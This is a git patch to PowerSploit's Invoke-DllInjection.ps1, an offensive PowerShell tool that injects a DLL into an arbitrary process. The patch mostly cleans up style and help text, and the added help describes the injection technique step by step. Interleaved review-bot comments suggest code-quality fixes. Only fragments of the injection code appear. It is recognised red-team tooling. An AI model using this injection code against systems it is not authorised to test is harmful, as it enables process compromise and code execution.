From 1980f403ee78234eae4d93b50890d02f827a099f Mon Sep 17 00:00:00 2001
From: HarmJ0y
Date: Wed, 14 Dec 2016 17:50:37 -0500
Subject: For ./CodeExecution/ :
-PSScriptAnalyzering
-Tweaking of synopsis blocks in order to support platyPS
-Code standardization
-Generated docs
---
 CodeExecution/Invoke-DllInjection.ps1 | 60 +++++++++++++++++++----------------
 1 file changed, 33 insertions(+), 27 deletions(-)
(limited to 'CodeExecution/Invoke-DllInjection.ps1')
diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1
index 369d606..d23e989 100644
--- a/CodeExecution/Invoke-DllInjection.ps1
+++ b/CodeExecution/Invoke-DllInjection.ps1
@@ -5,15 +5,19 @@ function Invoke-DllInjection
 Injects a Dll into the process ID of your choosing.
-PowerSploit Function: Invoke-DllInjection
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Invoke-DllInjection
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
 .DESCRIPTION
 Invoke-DllInjection injects a Dll into an arbitrary process.
+It does this by using VirtualAllocEx to allocate memory the size of the
+DLL in the remote process, writing the names of the DLL to load into the
+remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
+to invoke LoadLibraryA in the context of the remote process.
 .PARAMETER ProcessID
@@ -40,6 +44,8 @@ Use the '-Verbose' option to print detailed information.
 http://www.exploit-monday.com
 #>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
 Param (
 [Parameter( Position = 0, Mandatory = $True )]
 [Int]
@@ -59,7 +65,7 @@ http://www.exploit-monday.com
 {
 Throw "Process does not exist!"
 }
-
+
 # Confirm that the path to the dll exists
 try
 {
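Review bot: The new .DESCRIPTION lines in the first hunk carry two wording slips: `writing the names of the DLL` should be singular, and `remote process spacing` should read `remote process's address space`. Suggested replacement for those two lines: `DLL in the remote process, writing the name of the DLL to load into the` / `remote process's address space using WriteProcessMemory, and then using RtlCreateUserThread`. Because this is comment-based help that platyPS renders, the slip is carried into the generated docs as well.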
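Review bot: The added `[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]` in the second hunk silences the analyzer instead of addressing what it flags: a function that writes into and starts a thread in another process is exactly the kind of state-changing operation `SupportsShouldProcess` exists for, and the empty second argument leaves no record of why the rule was waived. Either declare `[CmdletBinding(SupportsShouldProcess = $true)]` and gate the injection steps behind `if ($PSCmdlet.ShouldProcess("PID $ProcessID", "Inject $Dll"))`, which gives callers `-WhatIf` and `-Confirm`, or keep the suppression but add `Justification = '<reason>'` so the waiver is reviewable. The function body the attribute applies to lies outside this hunk.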
@@ -79,11 +85,11 @@ http://www.exploit-monday.com
 Param (
 [OutputType([Type])]
-
+
 [Parameter( Position = 0)]
 [Type[]]
 $Parameters = (New-Object Type[](0)),
-
+
 [Parameter( Position = 1 )]
 [Type]
 $ReturnType = [Void]
@@ -98,7 +104,7 @@ http://www.exploit-monday.com
 $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
 $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
 $MethodBuilder.SetImplementationFlags('Runtime, Managed')
-
+
 Write-Output $TypeBuilder.CreateType()
 }
@@ -107,11 +113,11 @@ http://www.exploit-monday.com
 Param (
 [OutputType([IntPtr])]
-
+
 [Parameter( Position = 0, Mandatory = $True )]
 [String]
 $Module,
-
+
 [Parameter( Position = 1, Mandatory = $True )]
 [String]
 $Procedure
@@ -128,7 +134,7 @@ http://www.exploit-monday.com
 $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
 $tmpPtr = New-Object IntPtr
 $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
-
+
 # Return the address of the function
 Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
 }
@@ -142,43 +148,43 @@ http://www.exploit-monday.com
 [String]
 $Path
 )
-
+
 # Parse PE header to see if binary was compiled 32 or 64-bit
 $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
-
+
 [Byte[]] $MZHeader = New-Object Byte[](2)
 $FileStream.Read($MZHeader,0,2) | Out-Null
-
+
 $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
 if ($Header -ne 'MZ')
 {
 $FileStream.Close()
 Throw 'Invalid PE header.'
 }
-
+
 # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)
 $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null
-
+
 [Byte[]] $lfanew = New-Object Byte[](4)
-
+
 # Read offset to the PE Header (will be read in reverse)
 $FileStream.Read($lfanew,0,4) | Out-Null
- $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))
-
+ $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))
+
 # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE
 $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
 [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)
-
+
 # Read compiled architecture
 $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
- $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')
+ $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')
 $FileStream.Close()
-
+
 if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
 {
 Throw 'Invalid PE header or unsupported architecture.'
 }
-
+
 if ($Architecture -eq '014C')
 {
 Write-Output 'X86'
@@ -193,7 +199,7 @@ http://www.exploit-monday.com
 }
 }
-
+
 # Get addresses of and declare delegates for essential Win32 functions.
 $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
 $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
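Review bot: The `$FileStream` opened at the start of this hunk is closed by hand on each exit path, so any exception from `Seek` or `Read` (a locked or unreadable file, for instance) leaves the handle open until the garbage collector runs, and every future early exit has to remember its own `Close()`. Wrap the parsing between the `New-Object System.IO.FileStream` line and the last `$FileStream.Close()` in `try { … } finally { $FileStream.Close() }` and drop the two manual `Close()` calls. Separately, the reverse-and-hex round trips can be written as `$PEOffset = [BitConverter]::ToInt32($lfanew, 0)` and `$Architecture = [BitConverter]::ToUInt16($IMAGE_FILE_MACHINE, 0).ToString('X4')`, which yield the same values for these little-endian PE fields on a little-endian host and read more clearly than the `[-1..-4]` slices. The Param block of the enclosing helper starts before this hunk.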
@@ -307,7 +313,7 @@ http://www.exploit-monday.com
 {
 Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))"
 }
-
+
 $VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
 # Close process handle
@@ -317,7 +323,7 @@ http://www.exploit-monday.com
 # Extract just the filename from the provided path to the dll.
 $FileName = (Split-Path $Dll -Leaf).ToLower()
- $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.ToLower().Contains($FileName) }
+ $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) }
 if (!$DllInfo)
 {
--
cgit v1.2.3
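Review bot: `$_.FileName.ToLower().Contains($FileName)` in the second hunk is a substring test against each module's full path, so a module whose path merely contains the DLL's leaf name (a differently named DLL sharing the same suffix, or a directory named like the file) is reported as the injected module and the `if (!$DllInfo)` check below is satisfied by the wrong entry; `ToLower()` is also culture-sensitive. Compare leaf names instead: `$FileName = Split-Path $Dll -Leaf` and `Where-Object { (Split-Path $_.FileName -Leaf) -eq $FileName }`, since PowerShell's `-eq` on strings is already case-insensitive. The `if (!$DllInfo)` block continues past the end of the hunk.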